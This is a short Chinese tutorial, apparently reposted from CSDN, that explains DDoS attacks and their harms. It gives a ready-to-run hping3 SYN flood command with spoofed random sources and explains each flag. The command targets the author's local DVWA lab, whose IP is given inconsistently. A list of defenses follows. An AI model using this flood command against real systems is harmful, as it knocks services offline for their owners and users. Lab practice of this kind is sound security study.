DDoS攻击的概括
分布式拒绝服务 (英文意思是Distributed Denial of Service,简称DDoS) 是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击.(消耗目标服务器性能或网络带宽,从而造成服务器无法正常地提供服务)
目录:
免责声明:
严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
DDoS攻击可造成以下危害:
(1)造成客户业务不可用、利益受损.
(2)客户网内一个业务受到攻击,客户联网全面受阻,所有业务瘫痪,连锁反应严重.
(3)攻击引发的政治影响、社会舆论的压力给企业带来名誉损失.
测试机下载:
**链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg
提取码:tian **
靶场:
本地自己搭建的DVWA靶场:安装在win XP(IP地址:192.168.0.104)
DVWA靶场搭建链接: DVWA的靶场搭建_半个西瓜.的博客-CSDN博客
DDoS攻击的步骤:
命令:
hping3 -c 200000 -d 12000 -S -w 64 -p 801 --flood --rand-source 192.168.1.104
-c 是数据包数量.
-d 是数据包的大小.
-S 是数据包的类型.
-w winsize(默认 64)
-p 目标网站的端口.
--flood 开始洪水攻击,不考虑成不成功 都会执行.
--rand-source 根据局域网内更换IP地址,如果经过路由器转发的话还会显示源头IP的.
攻击后会发现网站不能正常访问.(192.168.1.104:801/dvwa/login.php 是自己搭建的服务器.)
DDoS防御:
(1)采用高性能的网络设备
(2)尽量避免NAT的使用
(3)充足的网络带宽保证
(4)升级主机服务器硬件
(5)把网站做成静态页面
(6)增强操作系统的TCP/IP栈
(7)安装专业抗DDOS防火墙
参考链接:DDOS防御的8种方法_u010563350的博客-CSDN博客_ddos防御
版权归原作者 半个西瓜. 所有, 如有侵权,请联系我们删除。